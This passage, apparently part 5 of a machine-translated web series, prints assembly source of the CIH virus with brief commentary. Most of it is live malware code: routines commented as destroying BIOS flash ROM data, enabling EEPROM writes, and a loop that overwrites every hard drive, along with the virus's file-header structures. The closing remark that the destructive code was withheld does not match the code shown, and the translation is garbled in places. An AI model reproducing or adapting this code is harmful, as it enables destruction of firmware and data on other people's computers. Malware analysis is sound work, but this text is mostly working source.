Virus program Source code example Anatomy-CIH virus [5]

virus Program Source code example Anatomy-CIH virus [5]

Push ECX
Loop $
　　
; destroys the ROM data of additional 000e0000-000e007f segments in the BIOS, a total of 80h bytes
XOR Ah, ah
mov [EAX], AL
　　
Xchg ecx, eax
Loop $
　　
; Displays and activates the BIOS 000E0000-000FFFFF segment data, a total of KB, the segment can be written to information mov eax, 0f5555h
Pop ecx
mov ch, 0aah
Call EBX
mov byte ptr [eax], 20h
　　
Loop $
　　
; Destroy BIOS 000fe000-000fe07f segment data, total 80h bytes
mov ah, 0e0h
mov [EAX], AL
　　
; Hide BIOS 000f0000-000fffff segment, total KB
mov word ptr (booleancalculatecode-@10) [esi], 100ch
Call ESI
　　
; Destroy all hard drives
Killharddisk:
XOR ebx, EBX
mov bh, Firstkillharddisknumber
Push EBX
Sub ESP, 2CH
Push 0c0001000h
mov bh, 08h
Push EBX
Push ECX
Push ECX
Push ECX
Push 40000501h
Inc ECX
Push ECX
Push ECX
　　
mov esi, esp
Sub ESP, 0ach
　　
; Cycle for Destruction
Loopofkillharddisk:
int 20h
DD 00100004h
　　
CMP word ptr [esi+06h], 0017h
Je killnextdatasection
　　
; Replace a hard drive
Changenextharddisk:
Inc byte PTR [ESI+4DH]
　　
JMP Loopofkillharddisk
　　
; Destroy the next area.
Killnextdatasection:
Add DWORD ptr [esi+10h], ebx
mov byte ptr [ESI+4DH], Firstkillharddisknumber
　　
JMP Loopofkillharddisk
　　
; Enable EEPROM to write information
Enableeepromtowrite:
mov [EAX], cl
mov [ECX], AL
mov byte ptr [eax], 80h
mov [EAX], cl
mov [ECX], AL
　　
Ret
　　
Ioforeeprom:
@10 = Ioforeeprom
　　
Xchg eax, EDI
Xchg edx, EBP
Out DX, eax
　　
Xchg eax, EDI
Xchg edx, EBP
In AL, DX
　　
Booleancalculatecode = $
Or AL, 44h
　　
Xchg eax, EDI
Xchg edx, EBP
Out DX, eax
　　
Xchg eax, EDI
Xchg edx, EBP
Out DX, AL
　　
Ret
　　
; static data definition
Lastvxdcalladdress = Ifsmgr_ring0_fileio; the last call to the VXD command address
Vxdcalladdresstable DB 00h
DB ifsmgr_removefilesystemapihook-_pageallocate
DB Unitobcspath-ifsmgr_removefilesystemapihook
DB Ifsmgr_ring0_fileio-unitobcspath; difference of each VXD invocation instruction address
　　
vxdcallidtable DD 00010053h, 00400068h, 00400041h, 00400032h; The invocation number of the VxD
Vxdcalltablesize = ($-vxdcallidtable)/04h; number of VxD calls used in the program
　　
Virus version and Copyright information definition
Virusversioncopyright db ' CIH v '; Identification of the CIH virus
DB majorvirusversion+ ' 0 '; major version number
DB '. '
DB minorvirusversion+ ' 0 '; minor version number
DB ' Tatung '; author's name
　　
; Virus size
Virussize = $ + sizeofviruscodesectiontableendmark (04h)
+ numberofsections*sizeofviruscodesectiontable (08h)
+ sizeofthefirstviruscodesectiontable (04h)
　　
; Dynamic Data definition
Virusgamedatastartaddress = Virussize
@6 = virusgamedatastartaddress; virus data start address
　　
Onbusy db 0; " Busy "flag
Filemodificationtime DD?; file modification Time
　　
FileNameBuffer db filenamebuffersize dup (?); 7fh long file name buffer
@7 = FileNameBuffer
　　
DataBuffer = $
@8 = DataBuffer
Numberofsections DW?; Number of blocks
TimeDateStamp DD?; File time
Symbolspointer DD?
Numberofsymbols DD?; Number of symbols in the symbol table
Sizeofoptionalheader DW?; length of optional file header
_characteristics DW?; Character Set flags
Magic DW?; sign Word (always 010BH)
Linkerversion DW?; Connector version number
Sizeofcode DD?; code Snippet Size
Sizeofinitializeddata DD?; initialized Chunk size
Sizeofuninitializeddata DD?; uninitialized chunk size
Addressofentrypoint DD?; program Start RVA
Baseofcode DD?; code snippet Start RVA
Baseofdata DD?; Data segment Start RVA
ImageBase dd? Loading base Address RVA
　　
@9 = $
Sectionalignment DD?; block alignment
FileAlignment DD?; File Block alignment
operatingSystemVersion DD?; Required operating system version number
Imageversion DD?; user-defined version number
Subsystemversion DD?; Required subsystem version number
Reserved DD?; Keep
Sizeofimage DD?; Total length of each part of the document
Sizeofheaders dd?; file Header Size
Sizeofimageheadertoread = $-numberofsections
Newaddressofentrypoint = DataBuffer
Sizeofimageheadertowrite = 04h
　　
Startofsectiontable = @9
SectionName = startofsectiontable; block name
VirtualSize = startofsectiontable+08h; segment true length
virtualaddress = startofsectiontable+0ch; RVA of Block
Sizeofrawdata = startofsectiontable+10h; Block physical length
Pointertorawdata = startofsectiontable+14h; Block physical offset
Pointertorelocations = startofsectiontable+18h; Relocation Offset
Pointertolinenumbers = startofsectiontable+1ch; Offset of the row number table
Numberofrelocations = startofsectiontable+20h; Number of relocated items
Numberoflinennmbers = startofsectiontable+22h; Number of row number tables
characteristics = startofsectiontable+24h; Block properties
sizeofscetiontable = Characteristics+04h-sectionname; The length of each table entry
　　
; The amount of memory required by the virus
Virusneedbasememory = $
Virusneedbasememory = $
　　
Virustotalneedmemory = @9
; + numberofsections (??) *sizeofscetiontable (28h)
; + Sizeofviruscodesectiontableendmark (04h)
; + numberofsections (??) *sizeofviruscodesectiontable (08h)
; + sizeofthefirstviruscodesectiontable (04h)
　　
; End of virus program
Virusgame ENDS
END Fileheader
From the above code analysis process, we can see that the CIH virus structure clear, distinct levels. The main structure of the virus program is very similar to the DOS virus, except that the details of the virus are handled by the Win95 method, and all system calls are using VXD. This makes the virus program more low-level, more efficient, and easy to program, compared with the API function under Windows, no need to consider the virus itself complex relocation process, compared with the use of interrupts, but also to prevent the application of trace analysis.

CIH virus has two innovations, one is the virus infection when looking for the infected object files in the white space between the blocks, the virus's own various data structures and code to write to it (if the white space is not contagious, which is why some files are not infected with one of the reasons); second, the virus attack can destroy computer hardware, Not only to burn flash Memory, but also to destroy the hard drive.

For security reasons, we did not give a detailed analysis of this part of the code for virus outbreaks and hardware destruction.

The above is the virus program source code example Analysis-CIH virus [5] content, more relevant content please pay attention to topic.alibabacloud.com (www.php.cn)!

